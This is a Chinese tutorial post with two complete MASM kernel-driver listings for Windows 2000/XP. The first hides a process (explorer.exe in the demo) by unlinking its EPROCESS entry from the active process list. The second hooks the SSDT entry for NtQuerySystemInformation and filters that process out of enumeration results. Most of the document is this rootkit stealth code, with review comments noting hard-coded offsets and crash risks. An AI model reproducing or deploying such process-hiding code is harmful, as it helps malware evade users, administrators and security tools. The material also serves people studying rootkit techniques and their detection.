		
		
		
		作者:dge
进程隐藏的两种方法
这两种都是很古老的方法,因为无聊,所以写了一下。代码只在 XP SP2 下调试通过:第一种方法把 EPROCESS 中 ActiveProcessLinks 和 ImageFileName 的偏移量写死在代码里(只区分 Windows 2000 / XP 两个次版本号),换一个系统版本就必须重新核对偏移,否则会写坏内核内存。
(1).从活动进程链表(ActiveProcessLinks)中摘除目标进程(示例代码摘除的是 explorer.exe,而不是加载驱动的进程自身)。这种方法可以欺骗任务管理器等依靠遍历 EPROCESS 链表枚举进程的工具;但进程的线程、句柄表等其它内核结构并未改动,依据这些结构枚举的工具仍然能看到它。
下面这个程序做的就是双向链表的删除节点(加载时)和插入节点(卸载时),十分的简单。
; Listing 1 - process hiding by unlinking an EPROCESS from ActiveProcessLinks.
; MASM, 32-bit kernel-mode driver. Only Windows 2000 / XP x86 layouts are
; handled: DriverEntry hard-codes the EPROCESS offsets per NT minor version.
.386
.model flat, stdcall
option casemap:none
include f:\masm32\include\w2k\ntstatus.inc
include f:\masm32\include\w2k\ntddk.inc
include f:\masm32\include\w2k\ntoskrnl.inc
include f:\masm32\include\w2k\w2kundoc.inc
includelib f:\masm32\lib\w2k\ntoskrnl.lib
include f:\masm32\Macros\Strings.mac

; Prototypes. _DispatchControlIo is declared here but no definition appears
; in this listing and DriverEntry never installs a dispatch routine.
_DriverUnload proto :PDRIVER_OBJECT
_DispatchControlIo proto :PDEVICE_OBJECT,:PIRP

.const
; Device and symbolic-link names. Note that nothing in this listing calls
; IoCreateSymbolicLink; _DriverUnload still tries to delete the link.
CCOUNTED_UNICODE_STRING "\\Device\\devHideprocess", g_usDeviceName, 4
CCOUNTED_UNICODE_STRING "\\??\\slHideprocess", g_usSymbolicLinkName, 4

.data
szHide      db 'explorer.exe',0     ; ANSI image name compared with strcmp against EPROCESS.ImageFileName
Flink       dd ?                    ; Flink neighbour of the unlinked entry, saved for _DriverUnload
Blink       dd ?                    ; Blink neighbour of the unlinked entry, saved for _DriverUnload
Explorer    dd ?                    ; address of the unlinked LIST_ENTRY; written only on a match

.code
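;-----------------------------------------------------------------------
; NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pusRegistryPath)
;
; Creates the control device, registers _DriverUnload, then walks the
; ActiveProcessLinks ring once, starting at the process that loaded the
; driver, and unlinks the first EPROCESS whose ImageFileName equals szHide.
; The unlinked entry and its two neighbours are stored in Explorer, Flink
; and Blink so that _DriverUnload can splice it back in.
;
; In:    pDriverObject   - driver object, receives the unload routine
;        pusRegistryPath - unused
; Out:   eax = STATUS_SUCCESS once the walk ran (also when szHide was not
;              found - Explorer then stays 0 and the list is untouched);
;              STATUS_DEVICE_CONFIGURATION_ERROR if IoCreateDevice failed,
;              the NT minor version is neither 0 nor 1, or the EPROCESS
;              lookup failed. On the last two paths the device object is
;              deleted again here, because DriverUnload is never called
;              for a DriverEntry that fails.
; Regs:  edi = LIST_ENTRY of the starting process (loop sentinel)
;        esi = LIST_ENTRY under inspection
;        ebx = ImageFileName pointer, later the Blink neighbour
;        eax = scratch / Flink neighbour
;
; NOTE(review): the offsets are hard-coded per NT minor version (0 -> 2000,
; 1 -> XP) and only the minor version is checked. The list is modified
; without the kernel's process-list lock and the neighbour pointers kept
; for _DriverUnload hold no object reference, so a process created or
; exiting concurrently, or a neighbour exiting before unload, can corrupt
; the ring - treat this as lab-VM code only.
;-----------------------------------------------------------------------
DriverEntry proc uses ebx edi esi, pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
        local   status:NTSTATUS
        local   pDeviceObject:PDEVICE_OBJECT
        local   dwId:DWORD
        local   lpEprocess:DWORD
        local   ListOffset:DWORD
        local   NameOffset:DWORD
        local   Version:DWORD

        mov     status,STATUS_DEVICE_CONFIGURATION_ERROR
        invoke  IoCreateDevice,pDriverObject,0,addr g_usDeviceName,FILE_DEVICE_UNKNOWN,0,FALSE,addr pDeviceObject
        cmp     eax,STATUS_SUCCESS
        jne     done                            ; nothing allocated yet

        mov     eax,pDriverObject
        assume  eax:ptr DRIVER_OBJECT
        mov     [eax].DriverUnload,offset _DriverUnload
        assume  eax:nothing

        ; Select the ActiveProcessLinks / ImageFileName offsets for this
        ; build. Only the minor version is requested (major is passed NULL).
        invoke  PsGetVersion,NULL,addr Version,NULL,NULL
        mov     eax,Version
        .if     eax == 0                        ; 5.0 - Windows 2000
                mov     ListOffset,0A0h
                mov     NameOffset,1FCh
        .elseif eax == 1                        ; 5.1 - Windows XP
                mov     ListOffset,88h
                mov     NameOffset,174h
        .else
                jmp     fail_device             ; unknown layout: refuse rather than guess
        .endif

        ; Starting point: the EPROCESS of the current (loading) process.
        ; PsLookupProcessByProcessId only fills lpEprocess on success.
        invoke  PsGetCurrentProcessId
        mov     dwId,eax
        invoke  PsLookupProcessByProcessId,dwId,addr lpEprocess
        cmp     eax,STATUS_SUCCESS
        jne     fail_device
        mov     esi,lpEprocess
        add     esi,ListOffset
        mov     edi,esi

walk:
        ; Examine esi BEFORE advancing, so the entry whose Flink points back
        ; at the sentinel is inspected too (the old loop skipped it).
        mov     ebx,esi
        sub     ebx,ListOffset
        add     ebx,NameOffset                  ; ebx -> EPROCESS.ImageFileName
        invoke  strcmp,ebx,addr szHide
        test    eax,eax
        jz      found
        assume  esi:PLIST_ENTRY
        mov     esi,[esi].Flink
        assume  esi:nothing
        cmp     esi,edi
        jne     walk
        jmp     walked                          ; szHide not present: list untouched

found:
        ; Unlink esi: prev->Flink = next, next->Blink = prev. The entry's own
        ; pointers are left intact; all three addresses are kept for unload.
        mov     Explorer,esi
        assume  esi:PLIST_ENTRY
        mov     eax,[esi].Flink
        mov     ebx,[esi].Blink
        assume  esi:nothing
        assume  eax:PLIST_ENTRY
        assume  ebx:PLIST_ENTRY
        mov     [ebx].Flink,eax
        mov     [eax].Blink,ebx
        assume  eax:nothing
        assume  ebx:nothing
        mov     Flink,eax
        mov     Blink,ebx
        invoke  DbgPrint,$CTA0("\n\n************hide process successful ***********\n\n")

walked:
        ; PsLookupProcessByProcessId returned a referenced EPROCESS; release
        ; it, otherwise the starting process can never be torn down.
        invoke  ObDereferenceObject,lpEprocess
        mov     status,STATUS_SUCCESS
        jmp     done

fail_device:
        ; DriverEntry is failing, so the device we created must go now.
        invoke  IoDeleteDevice,pDeviceObject

done:
        mov     eax,status
        ret
DriverEntry endp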
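;-----------------------------------------------------------------------
; VOID _DriverUnload(PDRIVER_OBJECT pDriverObject)
;
; Splices the LIST_ENTRY saved in Explorer back between the neighbours
; saved in Flink/Blink, then deletes the symbolic link and the device.
; Explorer is only written by DriverEntry on a successful match and the
; image's data is zero-filled at load, so 0 means nothing was unlinked and
; the relink is skipped (the old code wrote through NULL in that case).
;
; IoDeleteSymbolicLink is called although nothing in this listing creates
; g_usSymbolicLinkName; the resulting error status is ignored.
;
; NOTE(review): Flink/Blink are raw addresses saved at load time; if either
; neighbour process has exited since, this writes into freed memory.
;-----------------------------------------------------------------------
_DriverUnload proc pDriverObject:PDRIVER_OBJECT
        pushad
        mov     ebx,Explorer
        test    ebx,ebx
        jz      @F                              ; nothing was unlinked
        assume  ebx:PLIST_ENTRY
        mov     eax,Flink                       ; next->Blink = entry; entry->Flink = next
        assume  eax:PLIST_ENTRY
        mov     [eax].Blink,ebx
        mov     [ebx].Flink,eax
        mov     eax,Blink                       ; prev->Flink = entry; entry->Blink = prev
        mov     [eax].Flink,ebx
        mov     [ebx].Blink,eax
        assume  eax:nothing
        assume  ebx:nothing
@@:
        popad
        invoke  IoDeleteSymbolicLink,addr g_usSymbolicLinkName
        mov     eax,pDriverObject
        invoke  IoDeleteDevice,(DRIVER_OBJECT PTR [eax]).DeviceObject
        ret
_DriverUnload endp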
end DriverEntry
(2).如果你反汇编taskmgr.exe,可以发现taskmgr.exe是通过NtQuerySystemInformation枚举进程的,
因此可以通过挂钩系统服务NtQuerySystemInformation修改这个函数的行为:先调用原函数,再从它返回的 SystemProcessInformation 记录链表中把目标进程的记录摘掉(调整前一条记录的 NextEntryOffset),从而实现在任务管理器中隐藏进程的目的。下面就是实现代码(32 位 SSDT;服务号是从 ZwQuerySystemInformation 桩函数的 mov eax,imm32 指令中解析出来的)。
; Listing 2 - process hiding by hooking the SSDT entry of
; NtQuerySystemInformation. MASM, 32-bit kernel-mode driver.
.386
.model flat, stdcall
option casemap:none
include f:\masm32\include\w2k\ntstatus.inc
include f:\masm32\include\w2k\ntddk.inc
include f:\masm32\include\w2k\native.inc
include f:\masm32\include\w2k\ntoskrnl.inc
includelib f:\masm32\lib\w2k\ntoskrnl.lib
include f:\masm32\Macros\Strings.mac

.data
dwOldNtQuerySystemInformation  dd ?   ; original SSDT entry; restored by DriverUnload, never called by the hook itself
dwAddr                         dd ?   ; address of the patched SSDT slot

.const
CCOUNTED_UNICODE_STRING "\\Device\\devHideprocess", g_usDeviceName, 4
CCOUNTED_UNICODE_STRING "\\??\\slHideprocess", g_usSymbolicLinkName, 4   ; never created in this listing; DriverUnload still deletes it
CCOUNTED_UNICODE_STRING "explorer.exe", processname, 4                   ; image name filtered out (compared case-insensitively)

.code
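;-----------------------------------------------------------------------
; NTSTATUS NewNtQuerySystemInformation(SysInfoClass, lpSysInfo, SysInfoL, Return)
;
; Replacement SSDT entry. Forwards every call to the ntoskrnl export
; NtQuerySystemInformation (not to the saved dwOldNtQuerySystemInformation)
; and, when the call succeeded and the class is
; SystemProcessesAndThreadsInformation, removes every record whose image
; name equals processname from the linked records in lpSysInfo.
;
; Record layout assumed by the code: dword at +0 = offset to the next
; record (0 = last record), UNICODE_STRING at +38h = image name.
; The first record is never compared; scanning starts at the second one
; with ebx pointing at the first.
;
; Removal: prev.next += cur.next (cur skipped), or prev.next = 0 when cur
; is the last record. ebx is left on prev so several consecutive matches
; are all removed.
;
; The proc is stdcall with four dword arguments, so its ret pops the same
; 16 bytes as the service it replaces. eax (the original status) survives
; the filtering because pushad/popad bracket it.
;
; NOTE(review): lpSysInfo is the caller's buffer and is walked here without
; any try/except, and the length/Return arguments are not used to bound the
; walk; a hostile or concurrently modified buffer can fault the kernel.
;-----------------------------------------------------------------------
NewNtQuerySystemInformation     proc  SysInfoClass,lpSysInfo,SysInfoL,Return
        invoke  NtQuerySystemInformation,SysInfoClass,lpSysInfo,SysInfoL,Return
        pushad
        test    eax,eax
        jnz     exit                            ; only filter successful results
        .if     SysInfoClass == SystemProcessesAndThreadsInformation
                mov     esi,lpSysInfo
                mov     ebx,esi                 ; ebx = previous record
                add     esi,[esi]               ; esi = current record (second one)
        @@:
                add     esi,38h                 ; esi -> image name UNICODE_STRING
                invoke  RtlCompareUnicodeString,addr processname,esi,1
                .if     eax == 0
                        invoke  DbgPrint,$CTA0("\nsuccessful \n")
                        .if     dword ptr [esi-38h] == 0
                                mov     dword ptr [ebx],0   ; cur was last: prev becomes last
                                jmp     exit
                        .else
                                sub     esi,38h
                                mov     edx,[esi]
                                add     [ebx],edx           ; prev now skips cur
                                add     esi,[esi]
                                jmp     @B
                        .endif
                .else
                        sub     esi,38h
                        cmp     dword ptr [esi],0
                        jz      exit            ; end of list
                        mov     ebx,esi
                        add     esi,[esi]
                        jmp     @B
                .endif
        .endif
exit:
        popad
        ret
NewNtQuerySystemInformation    endp

;-----------------------------------------------------------------------
; NTSTATUS HookFunction(void)
;
; Locates the SSDT slot of NtQuerySystemInformation and overwrites it with
; NewNtQuerySystemInformation, saving the slot address in dwAddr and the
; previous value in dwOldNtQuerySystemInformation. Always returns
; STATUS_SUCCESS.
;
; The service index is recovered from the ZwQuerySystemInformation stub:
; the code assumes the linked symbol resolves to a 6-byte jmp dword ptr
; [IAT] thunk (skip 2 opcode bytes, read the IAT slot address, read the
; real stub address) and that the real stub starts with mov eax,imm32
; (skip 1 opcode byte, read imm32). The three loads through
; KeServiceDescriptorTable walk import slot -> descriptor -> ServiceTableBase;
; which load resolves which indirection depends on how ntoskrnl.inc
; declares the symbol - confirm against the include.
;
; Change from the original: the index is read as a full dword instead of
; its low byte only, so services numbered >= 256 are handled as well.
;
; NOTE(review): cli/sti only masks interrupts on this CPU; it neither
; synchronizes with other processors nor clears CR0.WP, so whether the
; store to the table faults depends on how the kernel image is mapped.
;-----------------------------------------------------------------------
HookFunction        proc
        pushad
        mov     eax,[KeServiceDescriptorTable]
        mov     esi,[eax]
        mov     esi,[esi]                       ; esi = ServiceTableBase
        mov     eax,ZwQuerySystemInformation
        inc     eax
        inc     eax                             ; skip FF 25 of the jmp [IAT] thunk
        mov     eax,[eax]                       ; eax = address of the IAT slot
        mov     eax,[eax]                       ; eax = ZwQuerySystemInformation in ntoskrnl
        inc     eax                             ; skip B8 of mov eax,imm32
        mov     ecx,dword ptr [eax]             ; ecx = service index (full 32 bits)
        sal     ecx,2                           ; dword slots
        add     esi,ecx
        mov     dwAddr,esi
        mov     edi,dword ptr [esi]
        mov     dwOldNtQuerySystemInformation,edi
        mov     edi,offset NewNtQuerySystemInformation
        cli
        mov     dword ptr [esi],edi
        sti
        popad
        mov     eax,STATUS_SUCCESS
        ret
HookFunction     endp

;-----------------------------------------------------------------------
; VOID DriverUnload(PDRIVER_OBJECT pDriverObject)
;
; Writes dwOldNtQuerySystemInformation back into the SSDT slot saved in
; dwAddr, then deletes the (never created) symbolic link and the device.
;
; NOTE(review): nothing waits for calls that are still executing inside
; NewNtQuerySystemInformation; a thread still running there when the image
; is unmapped will crash the system.
;-----------------------------------------------------------------------
DriverUnload        proc pDriverObject:PDRIVER_OBJECT
        pushad
        mov     esi,dwAddr
        mov     eax,dwOldNtQuerySystemInformation
        cli
        mov     dword ptr [esi],eax
        sti
        invoke  IoDeleteSymbolicLink,addr g_usSymbolicLinkName
        mov     eax,pDriverObject
        invoke  IoDeleteDevice,(DRIVER_OBJECT PTR [eax]).DeviceObject
        popad
        ret
DriverUnload endp

;-----------------------------------------------------------------------
; NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pusRegistryPath)
;
; Creates the control device, registers DriverUnload and installs the hook.
; Returns STATUS_DEVICE_CONFIGURATION_ERROR only when IoCreateDevice fails;
; HookFunction's result is not examined because it is always success.
;-----------------------------------------------------------------------
DriverEntry         proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
        local   status:NTSTATUS
        local   pDeviceObject:PDEVICE_OBJECT

        mov     status,STATUS_DEVICE_CONFIGURATION_ERROR
        invoke  IoCreateDevice,pDriverObject,0,addr g_usDeviceName,FILE_DEVICE_UNKNOWN,0,FALSE,addr pDeviceObject
        .if     eax == STATUS_SUCCESS
                mov     eax,pDriverObject
                assume  eax:ptr DRIVER_OBJECT
                mov     [eax].DriverUnload,offset DriverUnload
                assume  eax:nothing
                invoke  HookFunction
                mov     status,STATUS_SUCCESS
        .endif
        mov     eax,status
        ret
DriverEntry         endp
end DriverEntry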